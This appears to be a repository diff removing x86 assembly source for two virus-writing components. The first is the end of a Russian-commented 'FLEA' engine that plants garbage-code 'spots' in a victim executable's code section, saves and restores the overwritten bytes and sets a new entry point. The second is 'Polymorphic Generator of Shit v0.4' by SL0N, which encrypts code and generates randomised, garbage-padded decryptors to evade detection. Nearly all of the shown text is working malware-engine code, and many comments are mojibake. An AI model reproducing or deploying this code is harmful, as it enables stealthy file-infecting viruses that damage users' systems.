call [ebx].tgen_addr ;2 порция мусора для очередного пятнышка
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
mov [edx].buf_for_trash,eax
|
|
||||||
mov [edx].size_trash,3 ;размер эпилога
|
|
||||||
mov [edx].xmask1,0b
|
|
||||||
mov [edx].xmask2,1000b ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)
|
|
||||||
push edx
|
|
||||||
call [ebx].tgen_addr ;запишем эпилог для очередного пятна (mov ebp,esp pop ebp)
|
|
||||||
mov byte ptr [eax],0C3h ;и запишем ret
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
pop edx
|
|
||||||
inc edx
|
|
||||||
jmp _genspot_
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_endspot_:
|
|
||||||
mov edi,beg_rest_bytes
|
|
||||||
mov eax,num_spots ;корректируем кол-во записанных пятен (т.к. до этого мы не посчитали 1-ого пятна, которое всегда записывается в точке входа)
|
|
||||||
inc eax
|
|
||||||
stosb
|
|
||||||
mov eax,start_addr
|
|
||||||
mov esi,codesec
|
|
||||||
sub eax,[ebx].mapped_addr
|
|
||||||
sub eax,[esi].PointerToRawData
|
|
||||||
add eax,[esi].VirtualAddress
|
|
||||||
add eax,base
|
|
||||||
;--------------------------------------------------------------------------------------------------------
|
|
||||||
_enduep_:
|
|
||||||
mov esp,ebp
|
|
||||||
mov dword ptr [ebp+1Ch],eax ;результат в EAX
|
|
||||||
popad
|
|
||||||
ret 4
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец дфункции/движка FLEA
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;функция FLEA_RESTBYTES
|
|
||||||
;восстановление ранее сохраненных байт (на свои места)
|
|
||||||
;ВЫХОД:
|
|
||||||
; - делает свое дело :)
|
|
||||||
;EAX - кол-во сгенерированных пятен (на места которых восстановим ранее сохраненные байты)
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
FLEA_RESTBYTES:
|
|
||||||
pushad
|
|
||||||
cld
|
|
||||||
call _delta_ueprest_
|
|
||||||
_delta_ueprest_:
|
|
||||||
pop eax
|
|
||||||
sub eax,_delta_ueprest_
|
|
||||||
lea esi,[restore_bytes+eax]
|
|
||||||
push esi
|
|
||||||
xor eax,eax
|
|
||||||
lodsb
|
|
||||||
xchg eax,ebx ;сохраняем в EBX кол-во записанных пятен
|
|
||||||
mov edx,ebx
|
|
||||||
_nextrestspot_:
|
|
||||||
lodsd
|
|
||||||
xchg eax,ecx ;сохраняем в ECX размер очередного пятна
|
|
||||||
lodsd
|
|
||||||
xchg eax,edi ;сохраняем в EDI адрес, где находится очередное пятно
|
|
||||||
rep movsb ;и запишем на место этого пятна оригинальные (ранее сохраненные) байты
|
|
||||||
dec ebx
|
|
||||||
jne _nextrestspot_
|
|
||||||
pop eax
|
|
||||||
sub esi,eax
|
|
||||||
xchg eax,esi
|
|
||||||
mov dword ptr [esp+1Ch],edx
|
|
||||||
popad
|
|
||||||
ret
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функции FLEA_REST
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;функция FLEA_RESTSTACK
|
|
||||||
;сбаланирование стэка после после пятен
|
|
||||||
;ВХОД (stdcall) (FLEA_RESTSTACK(DWORD num_spots)):
|
|
||||||
;num_spots - количество отработанных в жертве пятен
|
|
||||||
; (это значение можно получить из буфера restore_bytes)
|
|
||||||
;ВЫХОД:
|
|
||||||
;балансировка стэка, а также в ECX=0, EAX = адрес команды, которая выполняется сразу после вызова данной
|
|
||||||
;функции (FLEA_RESTSTACK);
|
|
||||||
;ЗАМЕТКИ:
|
|
||||||
; так как каждое пятно меняло регистр EBP и ESP (клало EBP в стэк, а также адрес, следующий за
|
|
||||||
; CALL'ом), то надо восстановить данные регистры, и соответственно стэк.
|
|
||||||
; ВАЖНО: вызывать эту функцию только тогда, когда в стэке вы уже не храните никакие данные.
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
FLEA_RESTSTACK:
|
|
||||||
pop eax
|
|
||||||
pop ecx
|
|
||||||
_reststack_:
|
|
||||||
add esp,4 ;pop edx
|
|
||||||
mov esp,ebp
|
|
||||||
pop ebp
|
|
||||||
loop _reststack_
|
|
||||||
jmp eax
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функи FLEA_RESTSTACK
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;вспомогательная функция gen_mask
|
|
||||||
;генерация маски для мусора
|
|
||||||
;ВХОД (stdcall) (gen_mask(DWORD xmask)):
|
|
||||||
; xmask - начальная маска
|
|
||||||
;ВЫХОД:
|
|
||||||
; EAX - новая маска
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
gen_mask:
|
|
||||||
push ecx
|
|
||||||
mov ecx,dword ptr [esp+08]
|
|
||||||
push -1
|
|
||||||
call [ebx].rgen_addr
|
|
||||||
and ecx,eax
|
|
||||||
rol eax,10h
|
|
||||||
push eax
|
|
||||||
call [ebx].rgen_addr
|
|
||||||
and ecx,eax
|
|
||||||
xchg eax,ecx
|
|
||||||
pop ecx
|
|
||||||
ret 4
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функции gen_mask
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;вспомогательная функция get_jmpaddr
|
|
||||||
;получение операнда для jmp'a, который будет прыгать на следующее пятно
|
|
||||||
;ВЫХОД:
|
|
||||||
;ЕАХ - искомое значение
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
get_jmpaddr:
|
|
||||||
push max_jmp
|
|
||||||
call [ebx].rgen_addr
|
|
||||||
cmp eax,min_jmp
|
|
||||||
jb get_jmpaddr
|
|
||||||
ret
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функции get_jmpaddr
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;вспомогательная функция mix_addr
|
|
||||||
;перемешивание случайным образом данных в массиве
|
|
||||||
;заметки: в данном движке используется для перемешивания случаным образом адресов пятен
|
|
||||||
;ВХОД ( mix_adr(DWORD *addr_mas, DWORD num_elem) ):
|
|
||||||
;addr_mas - адрес буфера(массива), где находятся значения, которые следует перемешать
|
|
||||||
;num_elem - кол-во этих самых элементов
|
|
||||||
;ВЫХОД:
|
|
||||||
;перемешанные адреса в буфере(массиве)
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
mix_addr:
|
|
||||||
pushad ;
|
|
||||||
mov ecx,dword ptr [esp+28h] ;ECX - кол-во элементов
|
|
||||||
mov esi,dword ptr [esp+24h] ;ESI - адрес буфера, где находятся эти элементы
|
|
||||||
xor edx,edx
|
|
||||||
_nxtmix_:
|
|
||||||
push ecx
|
|
||||||
call [ebx].rgen_addr ;получаем СЧ [0..ECX-1]
|
|
||||||
push dword ptr [esi+edx*4] ;и перемешиваем
|
|
||||||
push dword ptr [esi+eax*4]
|
|
||||||
pop dword ptr [esi+edx*4]
|
|
||||||
pop dword ptr [esi+eax*4]
|
|
||||||
inc edx
|
|
||||||
cmp edx,ecx
|
|
||||||
jne _nxtmix_ ;если перемешали все элементы, то на выход
|
|
||||||
|
|
||||||
popad
|
|
||||||
ret 4*2
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
;конец функции mix_addr
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
;========================================================================================================
|
|
||||||
;вспомогательные переменные (находятся в стэке)
|
|
||||||
;========================================================================================================
|
|
||||||
imNTh equ dword ptr [ebp-04] ;указатель на IMAGE_NT_HEADERS
|
|
||||||
old_ep equ dword ptr [ebp-08] ;старая точка входа
|
|
||||||
base equ dword ptr [ebp-12] ;ImageBase
|
|
||||||
new_ep equ dword ptr [ebp-16] ;новая точка входа (в конец последней секции)
|
|
||||||
start_addr equ dword ptr [ebp-20] ;физический адрес точки входа (+ база мэппинга)
|
|
||||||
codesec equ dword ptr [ebp-24] ;указатель на кодовую секцию в табличке секций
|
|
||||||
size_codesec equ dword ptr [ebp-28] ;размер в кодовой секции, который реально можно использовать для записи пятен
|
|
||||||
max_codesec_addr equ dword ptr [ebp-32] ;максимальный допустимый адрес в кодовой секции, до которого можно записывать пятна
|
|
||||||
cur_codesec_addr equ dword ptr [ebp-36] ;текущий адрес в кодовой секции (используется для получения очередного адреса нового пятнышка)
|
|
||||||
num_spots equ dword ptr [ebp-40] ;кол-во реально записанных пятен в кодовую секцию
|
|
||||||
beg_rest_bytes equ dword ptr [ebp-44] ;адрес буфера, где хранится кол-во записанных пятен, размеры их, адреса, а также оригинальные байты кодовой секции
|
|
||||||
cur_rest_bytes equ dword ptr [ebp-48] ;текущий адрес в буфере (вспомогтальная переменная), куда сохраняем оригинальные байты кодовой секции etc
|
|
||||||
spot1 equ dword ptr [ebp-52] ;размер 1-ой порции мусора (этих первых порций мусора столько, сколько пятен будем записывать) (также вспомогательная переменная)
|
|
||||||
spot2 equ dword ptr [ebp-56] ;размер 2-ой порции мусора etc
|
|
||||||
tgen_struct equ dword ptr [ebp-60] ;адрес структуры TRASHGEN (для трэшгена xTG - или другого тэшгена)
|
|
||||||
xtmask1 equ dword ptr [ebp-64] ;новая маска1
|
|
||||||
xtmask2 equ dword ptr [ebp-68] ;новая маска2
|
|
||||||
|
|
||||||
restore_bytes db MAX_SPOTS*(uportion1+uportion2+7+10)+MAX_SPOTS*(4+4)+101 dup (00h);буфер, представляющий собой следующую структуру:
|
|
||||||
;num_spots db 1 ;кол-во записанных пятен в кодовой секции
|
|
||||||
;size_spot1 dd 1 ;размер очередного пятна
|
|
||||||
;addr_spot1 dd 1 ;адрес очередного пятнышка
|
|
||||||
;save_bytes1 db size_spot1 ;сохраненные оригинальные байты (вместо которых мы и записали очередное пятно)
|
|
||||||
;size_spot2 dd 1 ;etc
|
|
||||||
;addr_spot2 dd 1
|
|
||||||
;save_bytes2 db size_spot2
|
|
||||||
;...
|
|
||||||
;size_spot(num_spots) dd 1
|
|
||||||
;addr_spot(num_spots) dd 1
|
|
||||||
;save_bytes(num_spots) db size_spot(num_spots)
|
|
||||||
|
|
||||||
UEP_RESTBYTES_SIZE equ $ - restore_bytes ;размер буфера, что выше
|
|
||||||
;========================================================================================================
|
|
||||||
|
|
Binary file not shown.
@ -1,334 +0,0 @@
|
|||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; [POLYMORPHIC GENERATOR OF SHIT V. 0.4] ;
|
|
||||||
; ;
|
|
||||||
; ######### ######## ######## ;
|
|
||||||
; ########### ########## ########## ;
|
|
||||||
; ##### ###### ###### ## ###### ## ;
|
|
||||||
; ##### ##### ##### ##### ;
|
|
||||||
; ##### ##### ##### ######## ;
|
|
||||||
; ########### ##### ###### ######## ;
|
|
||||||
; ######### ##### ###### ##### ;
|
|
||||||
; ##### ##### ### ##### ;
|
|
||||||
; ##### ########### ########### ;
|
|
||||||
; ##### ##### ### ######### ;
|
|
||||||
; ;
|
|
||||||
; FOR MS WINDOWS ;
|
|
||||||
; ;
|
|
||||||
; BY SL0N ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; MANUAL: ;
|
|
||||||
; BUFFER FOR ENCRYPTED CODE + DECRYPTORS -> EDI ;
|
|
||||||
; START OF CODE -> EAX ;
|
|
||||||
; SIZE OF CODE -> ECX ;
|
|
||||||
; ;
|
|
||||||
; CALL MORPH ;
|
|
||||||
; ;
|
|
||||||
; SIZE OF ENCRYPTED CODE + DECRYPTORS -> ECX ;
|
|
||||||
; BUFFER WITH ENCRYPTED CODE + DECRYPTORS -> EDI ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; (+) DO NOT USE WIN API ;
|
|
||||||
; (+) EASY TO USE ;
|
|
||||||
; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ;
|
|
||||||
; (+) USE DELTA OFFSET ;
|
|
||||||
; (+) USE X87 INSTRUCTIONS ;
|
|
||||||
; (+) IT CREATES VARIABLE DECRYPTOR SIZE ;
|
|
||||||
; (+) RANDOMLY CHANGE REGISTERS IN INSTRUCTIONS ;
|
|
||||||
; (+) RANDOM 32 BIT ENCRYPTION ALGORITHM (ADD/SUB/XOR) ;
|
|
||||||
; (+) RANDOM NUMBER OF DECRYPTORS ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
morph:
|
|
||||||
push esi ebp ; Ñîõðàíÿåì ðåãèñòðû
|
|
||||||
|
|
||||||
call delta0 ;
|
|
||||||
delta0: ; Âû÷èñëÿåì
|
|
||||||
pop ebp ; äåëüòà ñìåùåíèå
|
|
||||||
sub ebp,offset delta0 ;
|
|
||||||
|
|
||||||
push eax ; Êëàä¸ì â ñòýê eax
|
|
||||||
decr_number:
|
|
||||||
mov eax,40 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî
|
|
||||||
call brandom32 ; â äèàïàçîíå 0..30
|
|
||||||
test eax,eax ; Åñëè ÷èñëî ðàâíî 0, òî îíî
|
|
||||||
jz decr_number ; íàì íå ïîäõîäèò
|
|
||||||
mov ebx,eax ; Ïîìåùàåì ÷èñëî â ebx
|
|
||||||
pop eax ; Âîññòàíàâëèâàåì eax
|
|
||||||
multi_decr:
|
|
||||||
mov edx,edi
|
|
||||||
call polym ;
|
|
||||||
mov eax,edx ;
|
|
||||||
add edi,ecx ; Ãåíåðèðóåì ñòîëüêî
|
|
||||||
dec ebx ; äåêðèïòîðîâ, ñêîëüêî
|
|
||||||
test ebx,ebx ; çàïèñàíî â ðåãèñòðå ebx
|
|
||||||
jnz multi_decr ;
|
|
||||||
|
|
||||||
sub edi,ecx ; ðåçóëüòàòàìè
|
|
||||||
|
|
||||||
pop ebp esi ; Âîññòàíàâëèâàåì ðåãèñòðû
|
|
||||||
ret ; Âîçâðàò èç ïîäïðîãðàììû
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
polym:
|
|
||||||
push ebp edi esi ebx ; Ñîõðàíÿåì ðåãèñòðû
|
|
||||||
|
|
||||||
mov [ebp+sz_code],ecx ; Çàíîñèì ïàðàìåòðû ñòàðòà
|
|
||||||
mov [ebp+begin_code],eax ; èç ðåãèñòðîâ â ïåðåìåííûå
|
|
||||||
mov [ebp+buff],edx ;
|
|
||||||
mov edi,edx ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
call len_gen ; Âûçûâàåì ãåíåðàòîð äëèí
|
|
||||||
mov [ebp+sz_decr],40
|
|
||||||
add [ebp+sz_decr],ecx ; äîáàâëÿåì äëèíû ìóñîðà ê
|
|
||||||
; ðàçìåðó äåêðèïòîðà
|
|
||||||
|
|
||||||
call reg_mutate ; Âûáèðàåì ðåãèñòðû, êîòîðûå
|
|
||||||
; áóäóò èñïîëüçîâàòüñÿ â
|
|
||||||
; äåêðèïòîðå
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+0] ; È ãåíåðèðóåì ïåðâóþ ïàðòèþ
|
|
||||||
call garbage ; ìóñîðíûõ èíñòðóêöèé
|
|
||||||
|
|
||||||
mov al,0e8h ; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
stosb ; èíñòðóêöèþ: call $+5
|
|
||||||
xor eax,eax ;
|
|
||||||
stosd ;
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+4] ; Ãåíåðèðóåì íîâóþ ïàðòèþ
|
|
||||||
call garbage ; ìóñîðíûõ èíñòðóêöèé
|
|
||||||
|
|
||||||
mov al,58h ; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
add al,bh ; èíñòðóêöèþ äåêðèïòîðà:
|
|
||||||
stosb ; pop reg1
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+8] ; Ãåíåðèðóåì ìóñîðíûå
|
|
||||||
call garbage ; èíñòðóêöèè
|
|
||||||
|
|
||||||
; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
mov al,81h ; èíñòðóêöèþ äåêðèïòîðà:
|
|
||||||
stosb ; add reg1,sz_decr-len[0]
|
|
||||||
mov al,0c0h ;
|
|
||||||
add al,bh ; Òàêèì îáðàçîì reg1 áóäåò
|
|
||||||
stosb ; óêàçûâàòü íà íà÷àëî
|
|
||||||
; çàêðèïòîâàííîãî êîäà
|
|
||||||
mov eax,[ebp+sz_decr] ;
|
|
||||||
sub eax,[ebp+len] ;
|
|
||||||
sub eax,9 ;
|
|
||||||
stosd ;
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+12] ; Ãåíåðèðóåì ìóñîðíûå
|
|
||||||
call garbage ; èíñòðóêöèè
|
|
||||||
|
|
||||||
mov al,8bh ; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
stosb ; mov reg2,reg1
|
|
||||||
;
|
|
||||||
mov al,bl ; Ó íàñ reg2 ïîçæå áóäåò
|
|
||||||
shl al,3 ; èñïîëüçîâàòüñÿ äëÿ
|
|
||||||
add al,0c0h ; ñðàâíåíèÿ
|
|
||||||
add al,bh ;
|
|
||||||
stosb
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+16] ; Ãåíåðèðóåì ìóñîðíûå
|
|
||||||
call garbage ; èíñòðóêöèè
|
|
||||||
|
|
||||||
mov al,81h ;
|
|
||||||
stosb ;
|
|
||||||
mov al,0c0h ;
|
|
||||||
add al,bl ;
|
|
||||||
stosb ;
|
|
||||||
; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
mov eax,[ebp+sz_code] ; add reg2,size_code
|
|
||||||
inc eax
|
|
||||||
stosd ;
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+20] ; Ãåíåðèðóåì ìóñîðíûå
|
|
||||||
call garbage ; èíñòðóêöèè
|
|
||||||
|
|
||||||
mov al,81h ;
|
|
||||||
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
mov al,0c0h ; èíñòðóêöèþ: add reg1,4
|
|
||||||
add al,bh ;
|
|
||||||
stosb ;
|
|
||||||
;
|
|
||||||
mov eax,4 ;
|
|
||||||
stosd ;
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+24] ; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
call garbage ; ïàðòèþ ìóñîðà
|
|
||||||
|
|
||||||
call random32 ;
|
|
||||||
mov [ebp+key2],eax ; Ñîõðàíÿåì êëþ÷ êðèïòîâàíèÿ
|
|
||||||
|
|
||||||
lea eax,[ebp+next] ; Êëàä¸ì â ñòýê ñìåùåíèå
|
|
||||||
push eax ; íà ìåòêó next
|
|
||||||
; Âûáèðàåì îäèí èç òð¸õ
|
|
||||||
; âàðèàíòîâ êðèïòîâàíèÿ
|
|
||||||
mov eax,3 ; ñëó÷àéíûì îáðàçîì.
|
|
||||||
call brandom32 ;
|
|
||||||
; Àëãîðèòìû êðèïòîâàíèÿ è
|
|
||||||
cmp al,1 ; äåêðèïòîâàíèÿ:
|
|
||||||
je enc_add32 ;
|
|
||||||
; 1) XOR
|
|
||||||
cmp al,2 ; 2) ADD
|
|
||||||
je enc_sub32 ; 3) SUB
|
|
||||||
enc_xor32:
|
|
||||||
|
|
||||||
mov al,81h ;
|
|
||||||
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
mov al,30h ; xor [reg1],key_decrypt
|
|
||||||
add al,bh ;
|
|
||||||
stosb ;
|
|
||||||
mov eax,[ebp+key2]
|
|
||||||
stosd
|
|
||||||
|
|
||||||
push edi ;
|
|
||||||
lea edi,[ebp+crypt_n] ;
|
|
||||||
mov al,33h ; À â ñàìîì äâèæêå ìåíÿåòñÿ
|
|
||||||
stosb ; àëãîðèòì êðèïòîâàíèÿ
|
|
||||||
pop edi ;
|
|
||||||
ret ; Ïåðåõîä íà ìåòêó next
|
|
||||||
enc_add32:
|
|
||||||
mov al,81h ;
|
|
||||||
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
mov al,bh ; add [reg1],key_decrypt
|
|
||||||
stosb ;
|
|
||||||
|
|
||||||
mov eax,[ebp+key2]
|
|
||||||
stosd
|
|
||||||
|
|
||||||
push edi ;
|
|
||||||
lea edi,[ebp+crypt_n] ;
|
|
||||||
mov al,2bh ; À â ñàìîì äâèæêå ìåíÿåòñÿ
|
|
||||||
stosb ; àëãîðèòì êðèïòîâàíèÿ
|
|
||||||
pop edi ;
|
|
||||||
ret ; Ïåðåõîä íà ìåòêó next
|
|
||||||
|
|
||||||
enc_sub32:
|
|
||||||
mov al,81h ;
|
|
||||||
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
|
|
||||||
mov al,028h ; èíñòðóêöèþ:
|
|
||||||
add al,bh ; sub [reg1],key_decrypt
|
|
||||||
stosb ;
|
|
||||||
|
|
||||||
mov eax,[ebp+key2]
|
|
||||||
stosd
|
|
||||||
|
|
||||||
push edi ;
|
|
||||||
lea edi,[ebp+crypt_n] ; À â ñàìîì äâèæêå ìåíÿåì
|
|
||||||
mov al,03h ; àëãîðèòì êðèïòîâàíèÿ
|
|
||||||
stosb ;
|
|
||||||
pop edi ;
|
|
||||||
ret ; Ïåðåõîä íà ìåòêó next
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
next:
|
|
||||||
mov ecx,[ebp+len+28] ; Ãåíåðèðóåì î÷åðåäíóþ
|
|
||||||
call garbage ; ïàðòèþ ìóñîðà
|
|
||||||
|
|
||||||
mov al,3bh ;
|
|
||||||
stosb ;
|
|
||||||
;
|
|
||||||
xor eax,eax ;
|
|
||||||
mov al,bh ; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
shl al,3 ; cmp reg1,reg2
|
|
||||||
add al,0c0h ;
|
|
||||||
add al,bl ;
|
|
||||||
stosb ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
mov ax,820fh ;
|
|
||||||
stosw ;
|
|
||||||
xor eax,eax ;
|
|
||||||
dec eax ; Ãåíåðèðóåì èíñòðóêöèþ:
|
|
||||||
mov ecx,7*4 ; jb decrypt
|
|
||||||
sub eax,[ebp+len+ecx] ;
|
|
||||||
mov ecx,6*4 ;
|
|
||||||
sub eax,[ebp+len+ecx] ;
|
|
||||||
sub eax,19 ;
|
|
||||||
stosd ;
|
|
||||||
|
|
||||||
mov ecx,[ebp+len+32] ; Ãåíåðèðóåì ìóñîðíûå
|
|
||||||
call garbage ; èíñòðóêöèè
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
mov ecx,[ebp+sz_code] ;
|
|
||||||
mov esi,[ebp+begin_code] ;
|
|
||||||
add ecx,esi ;
|
|
||||||
encrypt: ;
|
|
||||||
lodsd ; Êðèïòóåì âåñü êîä êëþ÷îì
|
|
||||||
crypt_n: ; è íóæíûì àëãîðèòìîì
|
|
||||||
xor eax,[ebp+key2] ;
|
|
||||||
stosd ;
|
|
||||||
cmp esi,ecx ;
|
|
||||||
jl encrypt ;
|
|
||||||
|
|
||||||
mov edx,[ebp+buff] ; Çàïîëíÿåì ðåãèñòðû
|
|
||||||
mov ecx,[ebp+sz_code] ; ðåçóëüòàòàìè
|
|
||||||
add ecx,[ebp+sz_decr] ;
|
|
||||||
|
|
||||||
pop ebx esi edi ebp ; Âîñòàíàâëèâàåì ðåãèñòðû
|
|
||||||
ret ; È âûõîäèì èç ïðîöåäóðû
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; GARBAGE LENGTH GENERATOR SUBROUTINE ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; [ IN ] ;
|
|
||||||
; ;
|
|
||||||
; NO INPUT IN SUBROTINE ;
|
|
||||||
;------------------------------------------------------------------------------;
|
|
||||||
; [ OUT ] ;
|
|
||||||
; ;
|
|
||||||
; LENGTH OF ALL GARBAGE -> ECX ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
len_gen: ; Ïîäïðîãðàììà ãåíåðàöèè
|
|
||||||
; äëèí äëÿ ìóñîðíûõ
|
|
||||||
; èíñòðóêöèé
|
|
||||||
xor ecx,ecx ; Îáíóëÿåì esi è ecx
|
|
||||||
xor esi,esi ;
|
|
||||||
loop1: ;
|
|
||||||
mov eax,100 ;
|
|
||||||
call brandom32 ; Íà÷èíàåì ãåíåðàöèþ
|
|
||||||
; äëèí, êàæäîå ÷èñëî
|
|
||||||
mov [ebp+len+esi],eax ; äèàïàçîíå 0..100
|
|
||||||
add ecx,eax ;
|
|
||||||
add esi,4 ;
|
|
||||||
cmp esi,36 ;
|
|
||||||
jne loop1 ;
|
|
||||||
